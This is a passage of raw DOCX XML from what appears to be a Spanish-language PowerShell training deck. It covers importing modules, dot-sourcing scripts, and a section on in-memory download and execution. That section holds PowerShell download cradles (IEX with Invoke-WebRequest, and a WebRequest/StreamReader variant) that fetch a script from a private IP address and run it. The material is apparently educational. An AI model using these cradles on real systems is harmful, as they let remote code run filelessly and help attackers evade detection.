          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>*.psd1</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">", etc. se </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>pueden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>invocar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> un</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623452F4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="2113"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Sesión de PowerShell de la siguiente manera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5F390E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C1C7C78" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BDFCBC8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4399765F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="67"/>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79488" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3421E2F0" wp14:editId="130BDF31">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4515611</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>218473</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4191000" cy="379730"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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379730"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="21518D37" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="24"/>
                              <w:ind w:left="258"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="40"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="40"/>
                              </w:rPr>
                              <w:t>Módulo de importación &lt;Module_Name.ps1&gt;</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3421E2F0" id="Textbox 471" o:spid="_x0000_s1239" type="#_x0000_t202" style="position:absolute;margin-left:355.55pt;margin-top:17.2pt;width:330pt;height:29.9pt;z-index:-1563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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="21518D37" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="24"/>
                        <w:ind w:left="258"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="40"/>
                        </w:rPr>
                        <w:t>Módulo de importación &lt;Module_Name.ps1&gt;</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="715EF59F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="574"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6301D02B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2113"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1007"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Sin embargo, un script de PowerShell se puede invocar de una manera única denominada "</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>dot sourcing a script</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579BE1C1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123084AE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="17"/>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80000" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="497E11A6" wp14:editId="0477E5A6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4730496</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>186144</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3420110" cy="593090"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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0110" cy="593090"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="23AB421C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="136"/>
                              <w:ind w:left="820"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="40"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="40"/>
                              </w:rPr>
                              <w:t>. .\&lt;Script_Name&gt;.ps1</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="497E11A6" id="Textbox 472" o:spid="_x0000_s1240" type="#_x0000_t202" style="position:absolute;margin-left:372.5pt;margin-top:14.65pt;width:269.3pt;height:46.7pt;z-index:-15636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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="23AB421C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="136"/>
                        <w:ind w:left="820"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="40"/>
                        </w:rPr>
                        <w:t>. .\&lt;Script_Name&gt;.ps1</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5EB956" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="840" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF905F0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1287"/>
        </w:tabs>
        <w:spacing w:before="46"/>
        <w:ind w:left="1287" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Descarga y ejecución en memoria de PowerShell base:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42659F08" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F92BD63" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B7863BE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="649755A0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="44"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487680512" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06B1CAB4" wp14:editId="6DBA141C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3479291</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>203444</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5082540" cy="368935"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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68935"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="25D022EE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="85"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve">IEX (IWR </w:t>
                            </w:r>
                            <w:hyperlink r:id="rId218">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial"/>
                                  <w:color w:val="2E5496"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t>'http://192.168.2.2/file.ps1')</w:t>
                              </w:r>
                            </w:hyperlink>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="06B1CAB4" id="Textbox 473" o:spid="_x0000_s1241" type="#_x0000_t202" style="position:absolute;margin-left:273.95pt;margin-top:16pt;width:400.2pt;height:29.05pt;z-index:-1563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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="25D022EE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="85"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve">IEX (IWR </w:t>
                      </w:r>
                      <w:hyperlink r:id="rId219">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial"/>
                            <w:color w:val="2E5496"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>'http://192.168.2.2/file.ps1')</w:t>
                        </w:r>
                      </w:hyperlink>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBCC0A8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1037A53B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41CA84C0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11539C0F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F96AAEA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487681024" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16A26345" wp14:editId="6EC71386">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2191511</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>186078</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7842884" cy="1477010"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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884" cy="1477010"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="637C682F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="213"/>
                              <w:ind w:right="55"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-6"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>$down = [System.NET.WebRequest]::Cre</w:t>
                            </w:r>
                            <w:hyperlink r:id="rId220">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial"/>
                                  <w:color w:val="2E5496"/>
                                  <w:spacing w:val="-6"/>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t>ate("http://192.168.2.2/file.ps1")</w:t>
                              </w:r>
                            </w:hyperlink>
                          </w:p>
                          <w:p w14:paraId="36B5ACEA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="235"/>
                              <w:ind w:left="7" w:right="55"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-8"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>$read = $down. GetResponse()</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="72B75EAD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="234"/>
                              <w:ind w:left="5" w:right="55"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:w w:val="85"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve">IEX  </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-2"/>
                                <w:w w:val="95"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>([System.IO.StreamReader]($read. GetResponseStream())). ReadToEnd()</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="16A26345" id="Textbox 474" o:spid="_x0000_s1242" type="#_x0000_t202" style="position:absolute;margin-left:172.55pt;margin-top:14.65pt;width:617.55pt;height:116.3pt;z-index:-15635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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="637C682F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="213"/>
                        <w:ind w:right="55"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-6"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>$down = [System.NET.WebRequest]::Cre</w:t>
                      </w:r>
                      <w:hyperlink r:id="rId221">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial"/>
                            <w:color w:val="2E5496"/>
                            <w:spacing w:val="-6"/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>ate("http://192.168.2.2/file.ps1")</w:t>
                        </w:r>
                      </w:hyperlink>
                    </w:p>
                    <w:p w14:paraId="36B5ACEA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="235"/>
                        <w:ind w:left="7" w:right="55"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-8"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>$read = $down. GetResponse()</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="72B75EAD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="234"/>
                        <w:ind w:left="5" w:right="55"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:w w:val="85"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve">IEX  </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-2"/>
                          <w:w w:val="95"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>([System.IO.StreamReader]($read. GetResponseStream())). ReadToEnd()</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
